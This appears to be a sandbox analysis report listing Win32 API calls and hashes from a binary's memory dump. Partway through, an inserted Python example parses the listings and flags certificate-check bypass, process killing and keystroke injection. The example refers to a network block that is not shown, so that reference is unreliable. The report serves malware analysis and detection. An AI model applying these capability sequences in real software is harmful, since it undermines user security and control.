                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 2402799130-0
                          • Opcode ID: 5f716ab57ec31c28a298397fa4fb1357055fe3d5babe94f6e8bafe73387cc9b4
                          • Instruction ID: a9ba4c9c1d6e1aca577bbf6775378aaba7f1b321d85d177096ab7e9512b535f7
                          • Opcode Fuzzy Hash: 5f716ab57ec31c28a298397fa4fb1357055fe3d5babe94f6e8bafe73387cc9b4
                          • Instruction Fuzzy Hash: 0B61B930104601CFDB25AF29D888F65BBF5FF4A351F5049AEE1AA975B1CB70E881DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B6B204
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: e611916f3ab4d04f236cf6a340f8fe5c72c1ff7b19b839c23cad66e148b844ce
                          • Instruction ID: 8d203a302485a9273278d107e2348abd615c11b00c3c899e35e1a8560e6b0556
                          • Opcode Fuzzy Hash: e611916f3ab4d04f236cf6a340f8fe5c72c1ff7b19b839c23cad66e148b844ce
                          • Instruction Fuzzy Hash: 1C518031610204BEEF24AF288C95F9E7BF5EB06350F204196F515E72A1DB79E9D0CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B7E9EA
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B7EA0B
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B7EA20
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B7EA3D
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B7EA64
                          • DestroyCursor.USER32(00000000), ref: 00B7EA6F
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7EA8C
                          • DestroyCursor.USER32(00000000), ref: 00B7EA97
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          • API String ID: 3992029641-0
                          • Opcode ID: 3c29a105b358c20eed59c89b954cd349bcaab0c90619b5efb4646b0dfc441f79
                          • Instruction ID: 0630148062b7c0bbff97c73e38d383f373a6512309fc3e02120433a9bcaf9a1a
                          • Opcode Fuzzy Hash: 3c29a105b358c20eed59c89b954cd349bcaab0c90619b5efb4646b0dfc441f79
                          • Instruction Fuzzy Hash: 49514A70604205AFDB20DF68CC81FAA7BF5EF58750F104599F966972E0DB70E990DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B1F737
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B1F77E
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B7EB55
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B7EBC1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 35ef4928e06044f1dabfb1d8fb24bc0af0f58a0f31ae17f674451b2f9f97ac65
                          • Instruction ID: 8c1bd8bd897ded3933f54de0596257dcff6c9014758501c68e0a496566995434
                          • Opcode Fuzzy Hash: 35ef4928e06044f1dabfb1d8fb24bc0af0f58a0f31ae17f674451b2f9f97ac65
                          • Instruction Fuzzy Hash: A241A9316086829ADB3557289CC8AB67BD5EF4A315FA848EEE06B475F1CA70ECC0D711
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B47C0C: GetFileAttributesW.KERNEL32(?,00B46A7B), ref: 00B47C0D
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B47ED2
                          • _wcscmp.LIBCMT ref: 00B47EEA
                          • MoveFileW.KERNEL32(?,?), ref: 00B47F03
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 4093841705-0
                          • Opcode ID: 38c518f226b3761e67d252b90a6859c512f040b3f39f4d916ec97c0cf4e549e7
                          • Instruction ID: e688c87c62fca1060285e0d5f14b065c5a7bc2a24bdc30aba5ed6de62c67b589
                          • Opcode Fuzzy Hash: 38c518f226b3761e67d252b90a6859c512f040b3f39f4d916ec97c0cf4e549e7
                          • Instruction Fuzzy Hash: 83411271844229AACF25EBA4DC45ADDB3FCAF08710F5045EAE509E3141EF359B89CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B3E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3E158
                            • Part of subcall function 00B3E138: GetCurrentThreadId.KERNEL32 ref: 00B3E15F
                            • Part of subcall function 00B3E138: AttachThreadInput.USER32(00000000,?,00B3CD34,?,00000001), ref: 00B3E166
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE06
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B3CE23
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B3CE26
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE2F
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B3CE4D
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B3CE50
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B3CE59
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B3CE70
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B3CE73
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: c762aa8381ab2a4e56e400ca288fb59ef5613d22165ea0efa40893e7c32f1ce9
                          • Instruction ID: abfc8aa171a162d4daf8d400b10d1ebc91ad0c4aec8d94f136b2939025d9249a
                          • Opcode Fuzzy Hash: c762aa8381ab2a4e56e400ca288fb59ef5613d22165ea0efa40893e7c32f1ce9
                          • Instruction Fuzzy Hash: D7118EB1550618BEF6106BA48C8EF6A7B6DDF48754F600516F3407B0E4C9F26C51DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B045F0
                          • UnregisterHotKey.USER32(?), ref: 00B047BD
                          • DestroyWindow.USER32(?), ref: 00B75936
                          • FreeLibrary.KERNEL32(?), ref: 00B7599D
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B759CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 4174999648-3243417748
                          • Opcode ID: 534607ee7c09e70e5ac9923b0065189af34b54b16f4d2b70227b9b6b689173c6
                          • Instruction ID: e3ba02e2b38c26b5bb9af289a6ccccb966e7cb4827875418c14478a92a0e95b5
                          • Opcode Fuzzy Hash: 534607ee7c09e70e5ac9923b0065189af34b54b16f4d2b70227b9b6b689173c6
                          • Instruction Fuzzy Hash: 7B912D74600602CFD729EF14C899A69FBE4FF15700F5442E9E51AA72A2DF30AD6ACF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B69926
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B6993A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B69954
                          • _wcscat.LIBCMT ref: 00B699AF
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B699C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B699F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          • API String ID: 307300125-78025650
                          • Opcode ID: 18e1c0e886626a989bb40f1e778da81689591b65e3ca07b3b63665a8ad80c4d6
                          • Instruction ID: 439b43acad49049af029ecedf525d1bb60dfbcb06ffc44f999c0535e79a7cc14
                          • Opcode Fuzzy Hash: 18e1c0e886626a989bb40f1e778da81689591b65e3ca07b3b63665a8ad80c4d6
                          • Instruction Fuzzy Hash: 8841A171A00308ABEF219FA4CC85FEE77E8EF09350F1005AAF549A72D1D6759D84CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B46F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B46F7D
                            • Part of subcall function 00B46F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B46F8D
                            • Part of subcall function 00B46F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B47022
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6168B
                          • GetLastError.KERNEL32 ref: 00B6169E
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B616CA
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B61746
                          • GetLastError.KERNEL32(00000000), ref: 00B61751
                          • CloseHandle.KERNEL32(00000000), ref: 00B61786
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: 4204d5fe290a8a514c37215ccdf881f70a2de027f4f8c80d637b724ef34bb130
                          • Instruction ID: cba121c08b32ccc24fe75ee5c5c812e3d1c5115f2f7d72952960885f13b7d1bf
                          • Opcode Fuzzy Hash: 4204d5fe290a8a514c37215ccdf881f70a2de027f4f8c80d637b724ef34bb130
                          • Instruction Fuzzy Hash: 44419AB5A40201AFDB04EF58C8E5FADB7E5AF54714F088489F9069F2D2DBB8AD40CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

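The WinINet block above (InternetQueryOptionW/InternetSetOptionW with option 0x1F), the AttachThreadInput + PostMessageW block and the OpenProcess/TerminateProcess block each read as a capability once the raw hex arguments are decoded against documented Win32 constants (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100, WM_KEYDOWN/WM_KEYUP = 0x100/0x101, VK_LEFT/VK_RIGHT = 0x25/0x27, PROCESS_TERMINATE = 0x1). The following is an added example, not part of the Joe Sandbox report or of the sample it describes: a parser for the report's own "APIs" bullet format plus a small rule set that turns those three sequences into findings. The sample lines are copied from this report's listings; the rule names and the `Call`/`analyze` helpers are this example's own. One assumption is flagged in the code: the real `InternetSetOptionW` takes a pointer to the flags DWORD as its third argument, and the listing shows `00000100` there, so the rule treats that displayed value as the flag word rather than a pointer.

```python
"""Decode Joe Sandbox "APIs" reference lines and flag capabilities.

Added example, not part of the Joe Sandbox report. Constant tables hold
documented Win32 values; the rule set and the sample lines (copied from
this report's listings) are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {
    0x0080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
PROCESS_TERMINATE = 0x0001
WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VK_NAMES = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}

# One bullet of the report's "APIs" list: optional "Part of subcall function
# <addr>:" prefix, Api.MODULE, optional argument list, then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*(?:\u2022\s*)?(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list      # int for hex values, None for "?", str for literals
    ref: str
    parent: Optional[str] = None


def _arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok  # string argument such as "close all"


def parse_line(line: str) -> Optional[Call]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args") or ""
    args = [_arg(t) for t in raw.split(",") if t.strip()]
    return Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("parent"))


def analyze(text: str) -> List[str]:
    """Return capability findings for a block of API reference lines."""
    calls = [c for c in map(parse_line, text.splitlines()) if c]
    seen = {c.api for c in calls}
    findings = []
    for c in calls:
        a = c.args
        # InternetSetOptionW(hInternet, dwOption, lpBuffer, dwBufferLength): the
        # listing shows 0x100 where lpBuffer belongs; ASSUMPTION: that is the
        # resolved flags DWORD, not a pointer.
        if (c.api == "InternetSetOptionW" and len(a) >= 3
                and a[1] == INTERNET_OPTION_SECURITY_FLAGS and isinstance(a[2], int)):
            ignored = [n for bit, n in SECURITY_FLAGS.items() if a[2] & bit]
            if ignored:
                findings.append(f"tls-validation-disabled: {'|'.join(ignored)} @ {c.ref}")
        # OpenProcess(PROCESS_TERMINATE, ...) paired with TerminateProcess.
        if c.api == "OpenProcess" and a and a[0] == PROCESS_TERMINATE and "TerminateProcess" in seen:
            findings.append(f"process-kill: OpenProcess(PROCESS_TERMINATE)+TerminateProcess @ {c.ref}")
        # WM_KEYDOWN/WM_KEYUP posted after AttachThreadInput: synthetic input
        # delivered into another thread's message queue.
        if c.api == "PostMessageW" and len(a) >= 3 and a[1] in WM_NAMES and "AttachThreadInput" in seen:
            key = VK_NAMES.get(a[2], str(a[2]))
            findings.append(f"keystroke-injection: {WM_NAMES[a[1]]} {key} @ {c.ref}")
    return findings


# Constructed sample: lines copied from this report's function listings.
SAMPLE = """\
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B54CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B54CE1
  • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6168B
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00B61746
  • Part of subcall function 00B3E138: AttachThreadInput.USER32(00000000,?,00B3CD34,?,00000001), ref: 00B3E166
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B3CE23
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B3CE70
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B045F0
• _wcscmp.LIBCMT ref: 00B47EEA
"""

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

Feed it a whole report section rather than the sample to get one finding per function that weakens certificate checks, kills processes, or drives another window's input; `parent` is kept on each `Call` so a finding can be traced to the subcall address the report attributes it to.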
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00B462D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: 0661a5459edd24092252a046f62204bba3f351363d71c0227e269cb5cc1529e4
                          • Instruction ID: 5fe10bd7ad0af6b4e34a9c1b788cb4bf780e3709711727b99b6b6585f8fdbfb7
                          • Opcode Fuzzy Hash: 0661a5459edd24092252a046f62204bba3f351363d71c0227e269cb5cc1529e4
                          • Instruction Fuzzy Hash: 3A11E73120C353BEE7055A589C86DBA73E8DF17724B2000AAF505A66C2FBE0AF406266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00B47595
                          • LoadStringW.USER32(00000000), ref: 00B4759C
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B475B2
                          • LoadStringW.USER32(00000000), ref: 00B475B9
                          • _wprintf.LIBCMT ref: 00B475DF
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B475FD
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00B475DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 3648134473-3128320259
                          • Opcode ID: e7e663527479c5f5d0e8deb50a1e26d00f8eed10e5f651400ee4a8bb82241e51
                          • Instruction ID: 285ebfaeae3d8015b4892d36eee2b018a4aaba1348d0970e1f1af6dba601fd4f
                          • Opcode Fuzzy Hash: e7e663527479c5f5d0e8deb50a1e26d00f8eed10e5f651400ee4a8bb82241e51
                          • Instruction Fuzzy Hash: A00112F2540208BFE711A794AD89EEB77ACEB08311F4004A6B745E2091EE749E84CB75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62AE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3479070676-0
                          • Opcode ID: 325367cea97896c1c89beddfa0d2141686f253aae7652f401bc50226f309aa5e
                          • Instruction ID: cc6c554bd59a9e78825f8016a6f9ec2c6480a389becbb0085a1074f287076042
                          • Opcode Fuzzy Hash: 325367cea97896c1c89beddfa0d2141686f253aae7652f401bc50226f309aa5e
                          • Instruction Fuzzy Hash: C2916771604601AFDB01EF54C891B6EBBE5FF88310F14889DF9969B2A1DB38E945CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
